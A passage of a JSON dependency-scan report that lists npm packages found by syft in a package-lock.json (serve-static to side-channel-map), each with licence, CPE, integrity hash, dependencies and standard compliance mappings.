"serve-static 1.16.3", "description": "Package discovered: serve-static 1.16.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0a7cfe5561f2b18b", "name": "serve-static", "version": "1.16.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:serve-static:serve-static:1.16.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:serve-static:serve_static:1.16.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:serve_static:serve-static:1.16.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:serve_static:serve_static:1.16.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:serve:serve-static:1.16.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:serve:serve_static:1.16.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/serve-static@1.16.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/serve-static/-/serve-static-1.16.3.tgz", "integrity": "sha512-x0RTqQel6g5SY7Lg6ZreMmsOzncHFU7nhnRWkKgWuMTu5NN0DR5oruckMqRvacAN9d5w6ARnRBXl9xhDCgfMeA==", "dependencies": { "encodeurl": "~2.0.0", "escape-html": "~1.0.3", "parseurl": "~1.3.3", "send": "~0.19.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "aaaf7e5ff977361c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: set-blocking 2.0.0", "title": "set-blocking 2.0.0", "description": "Package discovered: set-blocking 2.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "afe02a75a981b13d", "name": "set-blocking", "version": "2.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:set-blocking:set-blocking:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:set-blocking:set_blocking:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:set_blocking:set-blocking:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:set_blocking:set_blocking:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:set:set-blocking:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:set:set_blocking:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/set-blocking@2.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "506518f9c8ac4766", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: setprototypeof 1.2.0", "title": "setprototypeof 1.2.0", "description": "Package discovered: setprototypeof 1.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "fc983ad918ad063a", "name": "setprototypeof", "version": "1.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:setprototypeof:setprototypeof:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/setprototypeof@1.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.2.0.tgz", "integrity": "sha512-E5LDX7Wrp85Kil5bhZv46j8jOeboKq5JMmYM3gVGdGH8xFpPWXUMsNrlODCrkoxMEeNi/XZIwuRvY4XNwYMJpw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "fdeea92c74bf39fa", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: sharp 0.34.5", "title": "sharp 0.34.5", "description": "Package discovered: sharp 0.34.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f96d5af8de184f83", "name": "sharp", "version": "0.34.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:sharp_project:sharp:0.34.5:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/sharp@0.34.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/sharp/-/sharp-0.34.5.tgz", "integrity": "sha512-Ou9I5Ft9WNcCbXrU9cMgPBcCK8LiwLqcbywW3t4oDV37n1pzpuNLsYiAV8eODnjbtQlSDwZ2cUEeQz4E54Hltg==", "dependencies": { "@img/colour": "^1.0.0", "detect-libc": "^2.1.2", "semver": "^7.7.3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a0d820679cbb3cb7", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: shebang-command 2.0.0", "title": "shebang-command 2.0.0", "description": "Package discovered: shebang-command 2.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "14d8b5cbe6162ddd", "name": "shebang-command", "version": "2.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:shebang-command:shebang-command:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:shebang-command:shebang_command:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:shebang_command:shebang-command:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:shebang_command:shebang_command:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:shebang:shebang-command:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:shebang:shebang_command:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/shebang-command@2.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", "dependencies": { "shebang-regex": "^3.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f5b7b8efb70e19a9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: shebang-regex 3.0.0", "title": "shebang-regex 3.0.0", "description": "Package discovered: shebang-regex 3.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b86e26fe1fc6c7c9", "name": "shebang-regex", "version": "3.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:shebang-regex:shebang-regex:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:shebang-regex:shebang_regex:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:shebang_regex:shebang-regex:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:shebang_regex:shebang_regex:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:shebang:shebang-regex:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:shebang:shebang_regex:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/shebang-regex@3.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6b555e361c3642d5", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: side-channel 1.1.0", "title": "side-channel 1.1.0", "description": "Package discovered: side-channel 1.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a236188908f1e843", "name": "side-channel", "version": "1.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:side-channel:side-channel:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side-channel:side_channel:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side_channel:side-channel:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side_channel:side_channel:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side:side-channel:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side:side_channel:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/side-channel@1.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/side-channel/-/side-channel-1.1.0.tgz", "integrity": "sha512-ZX99e6tRweoUXqR+VBrslhda51Nh5MTQwou5tnUDgbtyM0dBgmhEDtWGP/xbKn6hqfPRHujUNwz5fy/wbbhnpw==", "dependencies": { "es-errors": "^1.3.0", "object-inspect": "^1.13.3", "side-channel-list": "^1.0.0", "side-channel-map": "^1.0.1", "side-channel-weakmap": "^1.0.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "890b23d99b8d3706", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: side-channel-list 1.0.1", "title": "side-channel-list 1.0.1", "description": "Package discovered: side-channel-list 1.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2e4a230ff21329f1", "name": "side-channel-list", "version": "1.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:side-channel-list:side-channel-list:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side-channel-list:side_channel_list:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side_channel_list:side-channel-list:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side_channel_list:side_channel_list:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side-channel:side-channel-list:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side-channel:side_channel_list:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side_channel:side-channel-list:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side_channel:side_channel_list:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side:side-channel-list:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side:side_channel_list:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/side-channel-list@1.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/side-channel-list/-/side-channel-list-1.0.1.tgz", "integrity": "sha512-mjn/0bi/oUURjc5Xl7IaWi/OJJJumuoJFQJfDDyO46+hBWsfaVM65TBHq2eoZBhzl9EchxOijpkbRC8SVBQU0w==", "dependencies": { "es-errors": "^1.3.0", "object-inspect": "^1.13.4" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6043652240bb3202", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: side-channel-map 1.0.1", "title": "side-channel-map 1.0.1", "description": "Package discovered: side-channel-map 1.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "36c9d18daa63eabd", "name": "side-channel-map", "version": "1.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:side-channel-map:side-channel-map:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side-channel-map:side_channel_map:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side_channel_map:side-channel-map:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side_channel_map:side_channel_map:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side-channel:side-channel-map:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side-channel:side_channel_map:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side_channel:side-channel-map:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side_channel:side_channel_map:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side:side-channel-map:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:side:side_channel_map:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/side-channel-map@1.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/side-channel-map/-/side-channel-map-1.0.1.tgz", "integrity": "sha512-VCjCNfgMsby3tTdo02nbjtM/ewra6jPHmpThenkTYh8pG9ucZ/1P8So4u4FGBek/BjpOVsDCMoLA/iuBKIFXRA==", "dependencies": { "call-bound": "^1.0.2", "es-errors": "^1.3.0", "get-intrinsic": "^1.2.5", "object-inspect": "^1.13.3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch 